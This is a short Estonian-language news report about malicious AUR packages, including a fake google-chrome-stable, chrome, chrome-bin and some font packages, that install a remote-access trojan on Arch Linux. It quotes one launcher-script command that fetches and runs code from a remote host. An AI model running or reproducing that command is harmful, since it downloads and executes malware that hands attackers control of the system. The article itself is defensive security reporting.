AUR (Arch User Repository) hoidla, mida kasutatakse Arch Linuxis kolmandate osapoolte pakettide levitamiseks, jätkub pahatahtliku koodi avaldamine, mis on integreeritud mitteametlike brauserikogumite pakettidesse. Lisaks kaks nädalat tagasi tuvastatud pahavarat sisaldavatele pakettidele firefox-patch-bin, librewolf-fix-bin ja zen-browser-patched-bin, on AUR-i lisatud ka pakett google-chrome-stable, mis sisaldab samuti muudatust, mis paigaldab pahavaraga komponendi, mis annab kaugjuhtimise süsteemile.
Probleemse paketi PKGBUILD-failis tuvastati skripti paigaldamine brauseri google-chrome-stable.sh käivitamiseks, mis sisaldab muuhulgas käsku ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, mis laadis alla pahavara, mida VirusTotal teenus tuvastas kui troojalase Spark, mis võimaldab süsteemi kaugjuhtimist, protsesside käivitamist, failide edastamist, liikluse jälgimist ja ekraanipilte saatmist.
Pahavara pakett google-chrome-stable laaditi üles eelmise päeva jooksul ja eemaldati AUR-i administraatorite poolt paar tundi pärast avaldamist. Peaaegu kohe pärast google-chrome-stable eemaldamist laaditi AUR-i üles kaks pahavara paketti — «chrome» ja «chrome-bin», mis sisaldavad sarnast pahavara paigaldusskripti kasutaja süsteemis.
Seejärel tuvastati veel kolm pahavara paketti: ttf-mac-fonts-all, ttf-ms-fonts-all ja gromit.
Allikas: opennet.ru
